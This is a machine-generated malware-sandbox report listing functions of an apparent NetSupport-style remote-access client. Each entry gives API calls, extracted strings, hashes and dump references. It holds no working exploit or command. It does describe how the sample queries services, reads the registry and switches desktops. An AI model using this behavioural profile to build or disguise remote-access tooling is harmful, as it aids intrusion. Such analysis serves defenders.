                                                                                    • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                    • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                    • API String ID: 1594747848-1114959992
                                                                                    • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                    • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                    • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                    • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                    Function 1102CC10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,420B7E12,?,00000000,00000000), ref: 1102CE44
                                                                                    • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                    • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                    • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                    • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                    • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                    • API String ID: 83693535-2077998243
                                                                                    • Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                    • Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
                                                                                    • Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                    • Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50
                                                                                    Function 11132BF0 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 11132C60
                                                                                    • GetTickCount.KERNEL32 ref: 11132C91
                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                    • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick$FolderPathwsprintf
                                                                                    • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                    • API String ID: 1170620360-4157686185
                                                                                    • Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                    • Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
                                                                                    • Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                    • Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761
                                                                                    Function 111450A0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                    • _memset.LIBCMT ref: 1114512D
                                                                                      • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                    • _strncpy.LIBCMT ref: 111451FA
                                                                                      • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                    • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                    • API String ID: 3299820421-2117887902
                                                                                    • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                    • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                    • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                    • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                    Function 11026BA0 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _strtok.LIBCMT ref: 11026C26
                                                                                    • _strtok.LIBCMT ref: 11026C60
                                                                                    • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _strtok$Sleep
                                                                                    • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                    • API String ID: 2009458258-3774545468
                                                                                    • Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                    • Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
                                                                                    • Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                    • Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742
                                                                                    Function 11102C50 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                    • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                    • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                    • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                    • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                    • GetLastError.KERNEL32 ref: 11102CB1
                                                                                    • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                    • GetLastError.KERNEL32 ref: 11102CCF
                                                                                    Strings
                                                                                    • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                    • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                    • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                    • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                    • API String ID: 2036220054-60805735
                                                                                    • Opcode ID: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                    • Instruction ID: e6b285a79aa3308c0e4e86645e8e2c70f1a73097c1882eeb774c19519f5c9288
                                                                                    • Opcode Fuzzy Hash: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                    • Instruction Fuzzy Hash: 5D11C679A042167BE7086BB15C89FBFFA2DAFC571CF051438F91786545EE24B40483B6
                                                                                    Function 1115E380 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                    • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                    • wsprintfA.USER32 ref: 1115E3C8
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                    • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                    • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                    • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                    • API String ID: 1734919802-1728070458
                                                                                    • Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                    • Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
                                                                                    • Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                    • Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51
                                                                                    Function 111100D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • std::exception::exception.LIBCMT ref: 1111013A
                                                                                    • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                    • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                    • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                    • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                    • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                    • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                    • API String ID: 1976012330-1024648535
                                                                                    • Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                    • Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
                                                                                    • Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                    • Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
                                                                                    Function 1115BA20 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,420B7E12,00000000,?), ref: 1115BA67
                                                                                    • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                    • wsprintfW.USER32 ref: 1115BAA7
                                                                                    • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                    • wsprintfW.USER32 ref: 1115BB67
                                                                                    • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                    • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                    • API String ID: 3050498177-823534439
                                                                                    • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                    • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                    • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                    • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
                                                                                    Function 11145440 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                      • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                    • _memset.LIBCMT ref: 11145485
                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                    • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
